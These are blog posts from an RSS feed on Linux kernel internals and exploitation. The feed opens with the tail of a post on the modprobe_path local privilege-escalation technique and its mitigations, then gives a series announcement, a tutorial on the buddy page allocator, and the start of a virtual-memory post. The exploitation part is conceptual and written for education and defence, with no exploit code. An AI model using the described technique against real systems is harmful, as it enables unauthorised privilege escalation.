<p>From the code analysis earlier, some of you will also have noticed the more heavy handed approach of disabling <code>CONFIG_MODULES</code> entirely, preventing the <code>request_module()</code> code path from being reachable entirely, or any module loading for that matter - certainly an effective mitigation.</p>
<p>However, this approach suffers the same issue (though to a greater extent) as disabling <code>usermodehelper</code>, in that it&rsquo;s gonna remove a pretty integral feature that many aspects of modern distros for your average user have come to make use of.</p>
<p>That&rsquo;s not to say there isn&rsquo;t an argument for disabling autoloading, reducing a broader attack surface than <code>CONFIG_STATIC_USERMODEHELPER</code>; it all depends on use case.</p>
<hr>
<ol>
<li><a href="http://www.vishalchovatiya.com/program-gets-run-linux/">http://www.vishalchovatiya.com/program-gets-run-linux/</a></li>
<li>From the comment above <code>[struct linux_binprm](https://elixir.bootlin.com/linux/v5.18.5/source/include/linux/binfmts.h#L18)</code> definition</li>
<li>e.g. <code>load_elf_binary()</code>, <code>load_script()</code></li>
<li><a href="https://cateee.net/lkddb/web-lkddb/MODULES.html">CONFIG_MODULES</a> enables loadable module support, without this we can&rsquo;t <code>modprobe</code> new modules into the kernel</li>
<li>I believe the intention behind this check is to ignore invoking <code>request_module()</code> for plain-text files (that haven&rsquo;t already been picked up by <code>binfmt_script</code> at this point), under the assumption other binary formats will have at one non-printable byte.</li>
<li>If KASLR is present we also need an information leak, to know the address of kernell symbols, e.g. <code>modprobe_path</code> in order to rewrite it</li>
<li><a href="https://www.redhat.com/sysadmin/suid-sgid-sticky-bit">https://www.redhat.com/sysadmin/suid-sgid-sticky-bit</a></li>
<li><a href="https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER.html">https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER.html</a></li>
<li><a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=64e90a8acb8590c2468c919f803652f081e3a4bf">https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=64e90a8acb8590c2468c919f803652f081e3a4bf</a></li>
<li><a href="https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER_PATH.html">https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER_PATH.html</a></li>
<li>Which while doable, shifts the requirements from arbitrary kernel address write to a very lenient ROP chain or some kernel shellcode execution</li>
</ol>
<h2 id="conclusion">Conclusion</h2>
<p><img src="https://sam4k.com/content/images/2022/07/i_think_our_work_here_is_done.gif" alt=""></p>
<p>Not gonna lie, I thought this series might be an opportunity for me to whack out some shorter &lt;1000 word posts, but alas. Regardless, hopefully I&rsquo;ve given you some useful insights and an understanding into a popular technique used in kernel exploit development to achieve local privilege escalation on modern kernels.</p>
<p>Although an effective mitigation exists within the kernel, this doesn&rsquo;t protect anyone unless it&rsquo;s enabled in the kernel configuration. This technique is particularly popular among attackers, as it&rsquo;s a relatively low maintenance technique, requiring the offset for only one kernel symbol: <code>modprobe_path</code>. Of course, you still need an AAW primitive.</p>
<p>Going forward, there&rsquo;s plenty of more content for me to dive into. If you have anything in particular you&rsquo;re eager for me to cover, feel free to <a href="https://twitter.com/sam4k1">@me</a>.</p>
<p>Some ideas include tackling the various aspects of heap feng shui, ROP chains and its various sub-strands, broader approaches to exploiting various bug types such as use-after-frees, overflows etc. The list goes on and on! But that&rsquo;s all for now.</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>LiKE: A Series on Linux Kernel Exploitation</title><description>Thought the Linternals series was hype? Get ready for the even SEO friendlier LiKE, a series on Linux kernel exploitation.</description><link>https://sam4k.com/like-a-series-on-linux-kernel-exploitation/</link><guid isPermaLink="false">6266f3bd1b5b6d052837bfe7</guid><category>linux</category><category>kernel</category><category>xdev</category><dc:creator>sam4k</dc:creator><pubDate>Mon, 04 Jul 2022 14:50:00 +0000</pubDate><media:content url="https://sam4k.com/content/images/2022/04/tired_computer.gif" medium="image"/><content:encoded><![CDATA[<p>So you thought the <a href="https://sam4k.com/linternals-introduction/">Linternals</a> series was hype? Get ready for the even SEO friendlier LiKE, a series on all things Linux kernel exploitation.</p>
<p>I just couldn&rsquo;t help myself, despite spending my work days doing kernel exploit development, I&rsquo;m just that keen that I want to also cover it on my personal blog.</p>
<p>Seriously though, I think it&rsquo;s an extremely interesting topic for us to cover and will tie in nicely with the kernel internals knowledge we pick up from the <a href="https://sam4k.com/linternals-introduction/">Linternals</a> series.</p>
<p>Highlighted well in P0&rsquo;s recent post <a href="https://googleprojectzero.blogspot.com/2022/04/the-more-you-know-more-you-know-you.html">&ldquo;The More You Know, The More You Know You Don’t Know&rdquo;</a>, I think there is value in sharing and educating industry on the methodology and techniques that are being used by attackers. Plus kernel stuff is just cool right?</p>
<p>In terms of actual content, there&rsquo;s lots of scope for topics we can cover, and I&rsquo;m happy to hear your thoughts and suggestions. I have a few different areas I&rsquo;d like to cover:</p>
<ul>
<li><strong>Kernel exploitation techniques</strong>: often times kernel exploitation techniques are covered as part of a broader post on exploiting a particular bug, so I want to spend some time putting the spotlight on specific techniques - talking about when, why and how they&rsquo;re used as well as covering existing, future or possible mitigations.</li>
<li>Perhaps also highlighting <strong>mitigations</strong>? Talking about existing or upcoming security mitigations and how they impact(ed) the kernel exploitation space</li>
<li><strong>Classic kernel writeups</strong>: whether CTFs or real world PoCs, I&rsquo;m happy to spend some time providing technical coverage/analysis of cool stuff if that content isn&rsquo;t already out there</li>
</ul>
<p>Feel free to fire any questions, suggestions or *gasp* corrections my way <a href="https://twitter.com/sam4k1">@sam4k</a>.</p>
<h2 id="contents">Contents</h2>
<p><del>Similar to the Linternals post, going forward I&rsquo;ll keep this up-to-date as a sort of table of content for published posts in the LiKE series.</del></p>
<p>I&rsquo;ve since moved the contents to a <a href="https://sam4k.com/kernel-exploitation/">standalone page</a>, which you can reach from the navigation bar at the top, to keep things a bit more organised!</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>Linternals: Introducing Memory Allocators &amp; The Page Allocator</title><description>I know you&amp;#39;ve all been waiting for it, that&amp;#39;s right, we&amp;#39;re going to be taking a dive into another exciting aspect of Linux internals: memory allocators!</description><link>https://sam4k.com/linternals-memory-allocators-part-1/</link><guid isPermaLink="false">61cdb1e6484d4d42c8e4a679</guid><category>linux</category><category>kernel</category><category>memory</category><dc:creator>sam4k</dc:creator><pubDate>Fri, 10 Jun 2022 16:30:00 +0000</pubDate><media:content url="https://sam4k.com/content/images/2022/04/linternals.gif" medium="image"/><content:encoded><![CDATA[<p>I know you&rsquo;ve all been waiting for it, that&rsquo;s right, we&rsquo;re going to be taking a dive into another exciting aspect of Linux internals: memory allocators!</p>
<p>Don&rsquo;t worry, I haven&rsquo;t forgotten about the <a href="https://sam4k.com/linternals-virtual-memory-part-1/">virtual memory series</a>, but today I thought we&rsquo;d spice things up and shift our focus towards memory allocation in the Linux kernel. As always, I&rsquo;ll aim to lay the groundwork with a high level overview of things before gradually diving into some more detail.</p>
<p>In this first part (of many, no doubt), we&rsquo;ll cover the role of memory allocators within the Linux kernel at a high level to give some general context on the topic. We&rsquo;ll then take a look at the first of two types of allocator used by the kernel: the buddy (page) allocator.</p>
<p>We&rsquo;ll cover the high level implementation of the buddy allocator, with some code snippets from the kernel to complement this understanding, before diving into some more detail and wrapping things up by talking about some pros/cons of the buddy allocator.</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#0x01-so-memory-allocators">0x01 So, Memory Allocators?</a></li>
<li><a href="#0x02-the-buddy-page-allocator">0x02 The Buddy (Page) Allocator</a>
<ul>
<li><a href="#page-primer">Page Primer</a></li>
<li><a href="#buddy-system-algorithm">Buddy System Algorithm</a></li>
<li><a href="#nodes-zones-memory-stuff">Nodes, Zones &amp; Memory Stuff</a>
<ul>
<li><a href="#expanding-on-freearea">Expanding on free_area</a></li>
<li><a href="#touching-on-struct-page">Touching on struct page</a></li>
</ul>
</li>
<li><a href="#using-the-buddy-allocator">Using The Buddy Allocator</a></li>
<li><a href="#pros-cons">Pros &amp; Cons</a></li>
<li><a href="#wrapping-up">Wrapping Up</a></li>
</ul>
</li>
<li><a href="#next-time">Next Time!</a></li>
</ul>
<h2 id="0x01-so-memory-allocators">0x01 So, Memory Allocators?</h2>
<p>Alright, let&rsquo;s get stuck in! Like I mentioned, we&rsquo;ll start with the basics - what is a memory allocator? I could just say we&rsquo;re talking about a collection of code which looks to manage available memory, typically providing an API to <code>allocate()</code> and <code>free()</code> this memory.  </p>
<p>But what does that mean? For a moment let&rsquo;s forget about the complexities of modern day memory management in OS&rsquo;s, with all the various interconnected components:</p>
<p>Picture a computer with some physical memory, running a Linux kernel and a lot of usermode processes (think of all the chrome tabs). Both the kernel and the various user processes require physical memory to store the various data behind the virtual mappings we covered in parts <a href="https://sam4k.com/linternals-virtual-memory-0x02/">2</a> &amp; <a href="https://sam4k.com/linternals-virtual-memory-part-3/">3</a> of the virtual memory series.</p>
<p><img src="https://sam4k.com/content/images/2022/06/this_is_fine.gif" alt=""></p>
<p>Now picture the absolute chaos as processes are using the same physical memory addresses at the same time, clobbering each other&rsquo;s data, oh lord, even the kernel&rsquo;s data is getting overwritten? Is that chrome tab even using a physical address that exists?!</p>
<p>That is where the kernel&rsquo;s memory allocator comes in, acting as a gatekeeper of sorts for allocating memory when it is needed. It&rsquo;s job is to keep track of how much memory there is, what&rsquo;s free and what&rsquo;s in use.</p>
<p><img src="https://sam4k.com/content/images/2022/06/you_shall_not_pass.gif" alt=""></p>
<p>Rather than every process for themselves, if something requires a chunk of memory to store stuff in, it asks the memory allocator - simple enough right?</p>
<h2 id="0x02-the-buddy-page-allocator">0x02 The Buddy (Page) Allocator</h2>
<p>Now we&rsquo;ve got a high level understanding of memory allocators, let&rsquo;s take a look at how memory is managed and allocated in the Linux kernel.</p>
<p>While several implementations for memory allocation exist within the Linux kernel, they mainly work on top of the buddy allocator (aka page allocator), making it the fundamental memory allocator within the Linux kernel.  </p>
<h3 id="page-primer">Page Primer</h3>
<p>At this point, we should probably rewind and clarify what exactly a &ldquo;page&rdquo; is. As part of it&rsquo;s memory management approach, the Linux kernel (along with the CPU) divides virtual memory into &ldquo;pages&rdquo; which are <code>[PAGE_SIZE](https://elixir.bootlin.com/linux/v5.18.3/source/include/asm-generic/page.h#L18)</code> bytes of contiguous virtual memory.</p>
<p>Typically defined as <code>0x1000</code> bytes, or 4KB, pages are the common unit for managing memory in the Linux kernel. This is why you&rsquo;ll often see things in memory aligned on page boundaries, for example.</p>
<p>Anyway, while a fascinating topic, I&rsquo;ll not derail us too much! However this is definitely something I&rsquo;ll touch on in more detail in future posts, so don&rsquo;t worry :)</p>
<p>❗</p>
<p>Going forward, unless I&rsquo;m explicit, in examples using <code>PAGE_SIZE</code>, I&rsquo;ll assume a typical <code>PAGE_SIZE</code> of <code>0x1000</code>.</p>
<h3 id="buddy-system-algorithm">Buddy System Algorithm</h3>
<p>Back to the topic at hand - we&rsquo;ve covered where the &ldquo;page&rdquo; in page allocator comes from, what about the buddy part? Queue the buddy system algorithm (BSA) behind the buddy allocator, starting with the basics:</p>
<p>The buddy allocator tracks <strong>free</strong> chunks of <strong>physically contiguous</strong> memory via a freelist, <code>[free_area[MAX_ORDER]](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L632)</code>, which is an array of <code>[struct free_area](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L108)</code>.</p>
<p>Each <code>struct free_area</code> in the freelist contains a doubly linked circular list (the <code>[struct list_head](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/types.h#L178)</code>) pointing to the free chunks of memory.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">struct free_area        free_area[MAX_ORDER]; 
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">struct free_area {
</span></span><span class="line"><span class="cl">    struct list_head    free_list; 
</span></span><span class="line"><span class="cl">    unsigned long       nr_free;
</span></span><span class="line"><span class="cl">};
</span></span></code></pre></div><p><strong>simplified</strong> from <a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h">/include/linux/mmzone.h</a></p>
<p>Each <code>struct free_area</code>&rsquo;s linked list points to free, physically contiguous chunks of memory which are all the same size. The buddy allocator uses the index into the freelist, <code>free_area[]</code>, to categorise the size of these free chunks of memory.</p>
<p><img src="https://sam4k.com/content/images/2022/06/image-3.png" alt=""></p>
<p>This index is called the &ldquo;order&rdquo; of the list, such that the size of the free chunks of memory pointed to are of size <code>2order * [PAGE_SIZE](https://elixir.bootlin.com/linux/v5.18.3/source/include/asm-generic/page.h#L18)</code>, such that:</p>
<ul>
<li><code>free_area[0]</code> points to a <code>struct free_area</code> whose <code>free_list</code> contains a list of free chunks of physically contiguous memory; each being <code>20 * 0x1000</code> bytes == <code>0x1000</code> bytes AKA order-0 pages.</li>
<li><code>free_area[1]</code> points to a <code>struct free_area</code> whose <code>free_list</code> contains a list of free chunks of physically contiguous memory; each being <code>21 * 0x1000</code> bytes == <code>0x2000</code> bytes AKA order-1 pages.</li>
<li>&hellip;</li>
<li><code>free_area[[MAX_ORDER](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L28)]</code> -&gt; points to a <code>struct free_area</code> whose <code>free_list</code> contains a list of free chunks of physically contiguous memory; each being <code>2MAX_ORDER * 0x1000</code> bytes</li>
</ul>
<p>Okay, what&rsquo;s this got to do with buddies Sam?! Good question! One that brings us onto how the buddy allocator (de)allocates all this free memory it tracks.</p>
<p>Being the buddy <em><strong>allocator</strong></em>, it provides an API for users to both allocate and free all these various sized, physically contiguous chunks of memory. If we want to call the equivalent of <code>allocate(0x4000 bytes)</code>, what does this look like at a high level?</p>
<ol>
<li>
<p>Determine what order-n page satisfies the size of our allocation, in maths world, they do this via log stuff: <code>log2(alloc_size_in_pages)</code>, rounded up to the nearest int, will give us the appropriate order! Here, it&rsquo;s 2.</p>
</li>
<li>
<p>As the order is also the index into the freelist, we can check the corresponding <code>free_area[2]-&gt;free_list</code> to find a free chunk. If there is one, hoorah! We dequeue it from the list as it&rsquo;s no longer free and we can tell the caller about their newly acquired memory</p>
</li>
<li>
<p>However, if <code>free_area[2]-&gt;free_list</code> is empty, the buddy allocator will check the <code>free_list</code> of the next order up, in this case <code>free_area[3]-&gt;free_list</code>. If there&rsquo;s a free chunk, the allocator will then do the following:</p>
</li>
</ol>
<ul>
<li>Remove the chunk from <code>free_area[3]-&gt;free_list</code></li>
<li>Half the chunk (as any order-n page is guaranteed to be exactly twice the size of the order-n-1 page, as well as being physically contiguous in memory), creating two buddies! (I told you we&rsquo;d get round to it!)</li>
<li>One chunk is returned to the caller who requested the allocation, while the other chunk is now migrated to the order-n-1 list, <code>free_area[2]-&gt;free_list</code> in this case</li>
<li>On freeing, the allocator will check for physically adjacent, free chunks (buddies!) to remerge to higher orders if a <code>free_list</code> has too many freed chunks</li>
</ul>
<p><img src="https://sam4k.com/content/images/2022/06/buddy_split.gif" alt=""></p>
<p>that&rsquo;s right, i made a gif</p>
<ol start="4">
<li>If <code>free_area[3]-&gt;free_list</code> is also empty, the allocater will continue to check the higher order freelists until either it finds a free chunk or the request fails (if there are no free chunks in any of the higher orders either).</li>
</ol>
<p><img src="https://sam4k.com/content/images/2022/06/we_made_it.gif" alt=""></p>
<p>And there we are, a grossly-simplified (as always) overview of the buddy allocator within the Linux kernel. Perhaps I made a mistake intertwining code snippets and kernel specifics with a simplified approach, but hopefully it all made sense!</p>
<h3 id="nodes-zones-memory-stuff">Nodes, Zones &amp; Memory Stuff</h3>
<p>Okay, so we&rsquo;ve covered things at a fairly high level, but I&rsquo;d be remiss if I didn&rsquo;t clarify some of the specifics I glossed over in the last section, so buckle up.</p>
<p>First of all, in theme with our on going virtual memory series, let&rsquo;s clarify what exactly is being allocated here. We already know we&rsquo;re dealing with pages of memory, but where?</p>
<p>The buddy allocator is a virtual memory allocator, although it does so from the kernel region defined by <code>__PAGE_OFFSET_BASE</code> (aka lowmem aka physmap) which you&rsquo;ll recall<a href="https://sam4k.com/linternals-virtual-memory-part-3/">[1]</a> is a 1:1 virtual mapping of physical memory. Such that lowmem address x+1 will map to physical address y+1, x+2 to y+2, x+N to y+N etc; virtually contiguous memory from this region is guaranteed also to be physically contiguous too.</p>
<p>Keeping things relatively brief again, the Linux kernel organises physical memory into a tree-like hierarchy of <em>nodes</em> made up of <em>zones</em> made up of <em>pages frames[2]:</em></p>
<ul>
<li><strong>Nodes</strong>: these data structures, represented by <code>[pg_data_t](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L934)</code>, are abstractions of actual physical hardware stuff, specifically a node represents a &ldquo;bank&rdquo; of physical memory</li>
<li><strong>Zones</strong>: suffice to say nodes are made up of zones, represented by <code>[struct zone](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L514)</code>, which represent ranges within memory</li>
<li><strong>Page frames</strong>: zones are then page up of pages, represented by <code>[struct page](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mm_types.h#L72)</code>. Where a page describes a fixed-length (<code>PAGE_SIZE</code>) contiguous block of virtual memory, a page frame is a fixed-length contiguous block of physical memory that pages are mapped to</li>
</ul>
<h4 id="expanding-on-freearea">Expanding on <code>free_area</code></h4>
<p><img src="https://sam4k.com/content/images/2022/06/why_doing_this_to_me.gif" alt=""></p>
<p>Why am I burdening you with this knowledge? The answer is because not only did I leave out some details in the code snippet above by I straight up altered it (it was for your own good, I swear), so now I&rsquo;m going to correct my wrongs by unveiling the truth:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">free_area</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="k">struct</span> <span class="n">list_head</span>    <span class="n">free_list</span><span class="p">[</span><span class="n">MIGRATE_TYPES</span><span class="p">];</span> 
</span></span><span class="line"><span class="cl">    <span class="kt">unsigned</span> <span class="kt">long</span>       <span class="n">nr_free</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">};</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">zone</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="p">...</span>
</span></span><span class="line"><span class="cl">    <span class="cm">/* free areas of different sizes */</span>
</span></span><span class="line"><span class="cl">    <span class="k">struct</span> <span class="n">free_area</span>    <span class="n">free_area</span><span class="p">[</span><span class="n">MAX_ORDER</span><span class="p">];</span> 
</span></span><span class="line"><span class="cl">    <span class="p">...</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>Okay, let&rsquo;s unpack this. The buddy allocator actually keeps track of multiple freelists, <code>free_area[]</code>, specifically one per zone. We can see that here, as the freelist is actually a member of the <code>struct zone</code> which we touched on a moment ago.</p>
<p>Why? Err, good question. I won&rsquo;t delve into the nuances of NUMA/UMA systems and all that stuff but suffice to say when the buddy allocator is asked to allocate some memory, it may want to pick a zone from the node that is associated with the calling context (think &ldquo;closest&rdquo; node or most optimal).</p>
<p>Now that we have the full(ish) context, we can do a little bit of introspection and get some hands on using our ol&rsquo; faithful <code>procfs</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$ cat /proc/buddyinfo 
</span></span><span class="line"><span class="cl">----- zone info ------|    0   |  1   |  2   |  3   |  4   |  5   |  6   |  7   |  8   |  9   | 10  
</span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------------------------
</span></span><span class="line"><span class="cl">Node 0, zone      DMA      0      0      0      0      0      0      0      0      1      1      2 
</span></span><span class="line"><span class="cl">Node 0, zone    DMA32  11311   2358   1052    567    290    123     52     33     18     25      8 
</span></span><span class="line"><span class="cl">Node 0, zone   Normal   5977    942   2093   1983    804    256     93     45     28     39      4 
</span></span></code></pre></div><p>I&rsquo;ve added some headers in (lines 2-3), but what we&rsquo;re seeing here is a row for each zone&rsquo;s buddy allocator freelist, <code>free_area[MAX_ORDER]</code>. The first column tells us the node and zone, then each column after that tells us how many free pages (<code>nr_free</code>) there are for each page order, starting from order 0 and moving to order <code>MAX_ORDER</code>. Neat, right?</p>
<p>Moving back to the deception, the doubly linked circular list we said pointed to all the free chunks? Well that&rsquo;s actually an array of linked circular lists: <code>free_list[MIGRATE_TYPES]</code>. Don&rsquo;t worry though, each list in the array still points to free chunks. Pages of different types, defined by the enum <code>[MIGRATE_TYPES](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L67)</code>, are just stored in seperate lists in this array.</p>
<h4 id="touching-on-struct-page">Touching on <code>struct page</code></h4>
<p>Although I&rsquo;m planning to cover this in much more detail in the virtual memory series, I feel like it&rsquo;s worth touching on this goliath as to fill in some gaps in our overview.</p>
<p>So we&rsquo;ve already mentioned that each physical page (page frame) in the system has a <code>[struct page](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mm_types.h#L72)</code> associated with it. This tracks various metadata and is instrumental to the kernel&rsquo;s memory management model.</p>
<p>Given that these represent physical pages, it might not come as a surprise to learn that the &ldquo;free chunks&rdquo; that <code>free_area-&gt;free_list</code> points to are actually references to page structs. We can see that here by poking around <a href="https://elixir.bootlin.com/linux/v5.18.3/source/mm/page_alloc.c#L2986">mm/page_alloc.c</a>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="cm">/*
</span></span></span><span class="line"><span class="cl"><span class="cm"> * Do the hard work of removing an element from the buddy allocator.
</span></span></span><span class="line"><span class="cl"><span class="cm"> * Call me with the zone-&gt;lock already held.
</span></span></span><span class="line"><span class="cl"><span class="cm"> */</span>
</span></span><span class="line"><span class="cl"><span class="k">static</span> <span class="n">__always_inline</span> <span class="k">struct</span> <span class="n">page</span> <span class="o">*</span>
</span></span><span class="line"><span class="cl"><span class="nf">__rmqueue</span><span class="p">(</span><span class="k">struct</span> <span class="n">zone</span> <span class="o">*</span><span class="n">zone</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">order</span><span class="p">,</span> <span class="kt">int</span> <span class="n">migratetype</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">						<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">alloc_flags</span><span class="p">)</span>
</span></span></code></pre></div><p>Note the return type here, struct page * (we also see familiar qualifiers: zone, order, migrate type and flags)</p>
<p>Okay, whew, with that all cleared up, I think we have a reasonable overview of the buddy allocator within the Linux kernel! Hope you&rsquo;re still with me as we&rsquo;re not done yet!</p>
<hr>
<ol>
<li><a href="https://sam4k.com/linternals-virtual-memory-part-3/">https://sam4k.com/linternals-virtual-memory-part-3/</a></li>
<li>More on the topic here <a href="https://www.kernel.org/doc/gorman/html/understand/understand005.html">https://www.kernel.org/doc/gorman/html/understand/understand005.html</a></li>
</ol>
<h3 id="using-the-buddy-allocator">Using The Buddy Allocator</h3>
<p><img src="https://sam4k.com/content/images/2022/06/i_want_to_try.gif" alt=""></p>
<p>I figured I should get into the habit of promoting some kernel development hijinx and explore some of the APIs for the topics we discuss where relevant.</p>
<p>Let&rsquo;s dive in then and highlight some of the API exposed to kernel developers for use in modules &amp; device drivers. All defs can be found in <code>[/include/linux/gfp.h](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h)</code>:  </p>
<ul>
<li><code>alloc_pages(gfp_mask, order)</code>: Allocate 2<em>order</em> pages (one physically contiguous chunk from the order N freelist) and return a <code>struct page</code> address</li>
<li><code>alloc_page(gfp_mask)</code>: macro for <code>alloc_pages(gfp_mask, 0)</code></li>
<li><code>__get_free_pages(gfp_mask, order)</code> and <code>__get_free_page(gfp_mask)</code> mirror the above functions, except they return a virtual address to the allocation as opposed to a <code>struct page</code></li>
<li>For freeing options include: <code>__free_page(struct page *page)</code>, <code>__free_pages(struct page *page, order)</code> and <code>free_page(void *addr)</code></li>
<li>Plenty more to see if you take a browse of <code>[/include/linux/gfp.h](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h)</code></li>
</ul>
<p>Most of that should be fairly familiar at this point, except the <code>gfp_mask</code>, which we haven&rsquo;t covered. The <code>gfp_mask</code> is a set of GFP (Get Free Page) flags which lets us configure the behaviour of the allocator and are used across the kernels memory management stuff.</p>
<p>The inline documentation<a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h#L271">[1]</a> already does a good job at covering the different flags, so I won&rsquo;t rehash that here. My experience has mainly seen <code>GFP_KERNEL</code>, <code>GFP_KERNEL_ACCOUNT</code>[2], <code>GFP_ATOMIC</code>.</p>
<p>Despite a flexible API for different allocation use cases and requirements, they all ultimately call the real MVP, <code>__alloc_pages()</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">/*
</span></span><span class="line"><span class="cl"> * This is the &#39;heart&#39; of the zoned buddy allocator.
</span></span><span class="line"><span class="cl"> */
</span></span><span class="line"><span class="cl">struct page *__alloc_pages(gfp_t gfp, unsigned int order, int preferred_nid,
</span></span><span class="line"><span class="cl">							nodemask_t *nodemask)
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v5.18.3/source/mm/page_alloc.c#L5370">/mm/page_alloc.c</a></p>
<p>We&rsquo;ve already covered a lot of ground in this post, so I&rsquo;ll leave it as an exercise to the reader to take a look at this function to see what we&rsquo;ve covered so far in actual code :)</p>
<p>I&rsquo;ll also use this as an opportunity to plug my long neglected repo (but I plan to push some demos for Linternals posts up too, maybe), &ldquo;lmb&rdquo; aka Linux Misc driver Boilerplate; a very lightweight kernel module boilerplate for bootstraping kernel fun.</p>
<p><a href="https://github.com/sam4k/lmb">GitHub - sam4k/lmb: Very lightweight kernel module boilerplate for kernel development/testing.</a></p>
<hr>
<ol>
<li><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h#L271">https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h#L271</a></li>
<li><a href="https://twitter.com/poppop7331">@poppop7331</a> and <a href="https://twitter.com/vnik5287">@vnik5287</a> recently <a href="https://duasynt.com/blog/linux-kernel-heap-feng-shui-2022">did a cool blog</a> post covering modern heap exploitation, including the implications of <code>GFP_KERNEL_ACCOUNT</code> in recent kernel versions :)</li>
</ol>
<h3 id="pros-cons">Pros &amp; Cons</h3>
<p><img src="https://sam4k.com/content/images/2022/06/impatient_judy.gif" alt=""></p>
<p>Before we wrap up, and to give some context on the next section, let&rsquo;s take what we&rsquo;ve learned about the buddy allocator and highlight some of it&rsquo;s pros and cons.</p>
<p>First of all, due to the nature of the buddy system algorithm behind things, the buddy allocator is fast to (de)allocate memory. Furthermore, being able to split and remerge chunks on the go, there is little external fragmentation (this is where there&rsquo;s enough free memory to serve a request, just not in one contiguous chunk).</p>
<p>There&rsquo;s also other perf benefits, that we won&rsquo;t dive into here, to providing physically contiguous memory and guaranteeing cache aligned memory blocks.</p>
<p>The main downside here is the internal fragmentation, where the chunk of memory allocated is bigger than necessary, leaving a portion of it unused. Due to the fixed sizes, determined by 2order pages, if a request falls just too big for the previous order, we&rsquo;re gonna have a great deal of space wasted. Not to mention the smallest allocation is 1 page.</p>
<p>tl;dr: fast, contiguous allocations, low external fragmentation, bad internal fragmentation</p>
<h3 id="wrapping-up">Wrapping Up</h3>
<p>Memory allocation and management is an extremely complex topic with a lot of nuance and complexity which, as we saw, extends down to the hardware level.</p>
<p>Hopefully this has been a useful primer on one of the fundamentals to kernel memory allocation, the buddy allocator:</p>
<ul>
<li>We covered the role of memory allocators briefly, before learning that the buddy allocator acts as a fundamental memory allocation mechanism within the Linux kernel</li>
<li>We learned at a high level about the buddy system algorithm behind the buddy allocator, with some peaks into the actual kernel code from the mm system</li>
<li>Finally we pieced together our understanding with some extras on how memory is managed by the kernel, it&rsquo;s API and the pros/cons of the buddy allocator</li>
</ul>
<h2 id="next-time">Next Time!</h2>
<p><img src="https://sam4k.com/content/images/2022/06/hooray.gif" alt=""></p>
<p>The fun doesn&rsquo;t end here, don&rsquo;t you worry! We&rsquo;ve just scratched the surface. I hope you&rsquo;re ready to expand your repertoire of acronyms cos next time we&rsquo;ll be exploring the wonderful world of slab allocators: SLAB, SLUB &amp; SLOB.</p>
<p>Sitting above the buddy allocator, the slab allocator is another fundamental aspect of memory allocation and management in the Linux kernel, addressing the internal fragmentation problems of the buddy allocator - but that&rsquo;s for next time!</p>
<p>Thanks for reading, and as always feel free to <a href="https://twitter.com/sam4k1">@me</a> if you have any questions, suggestions or corrections :)</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>Linternals: The Kernel Virtual Address Space</title><description>In this part of our journey into virtual memory in Linux, we cover the mystical kernel memory map and all it entails.</description><link>https://sam4k.com/linternals-virtual-memory-part-3/</link><guid isPermaLink="false">623768ce1b5b6d052837b4de</guid><category>linux</category><category>kernel</category><category>memory</category><dc:creator>sam4k</dc:creator><pubDate>Tue, 10 May 2022 19:30:00 +0000</pubDate><media:content url="https://sam4k.com/content/images/2022/04/linternals-1.gif" medium="image"/><content:encoded><![CDATA[<p>Alright, we really made it to part 3 eh? Not bad! Before we dive straight in, let&rsquo;s quickly go over what we covered in the <a href="https://sam4k.com/linternals-virtual-memory-0x02/">last part</a> on the user virtual address space:</p>
<ul>
<li>Very brief overview, with some examples, of using <code>procfs</code> for introspection</li>
<li>The various mappings that make up a typical user virtual address space</li>
<li>Which syscalls userspace programs make use of to set up their virtual address space</li>
<li>Finally tying up some extras with how threading &amp; ASLR fit into this picture</li>
</ul>
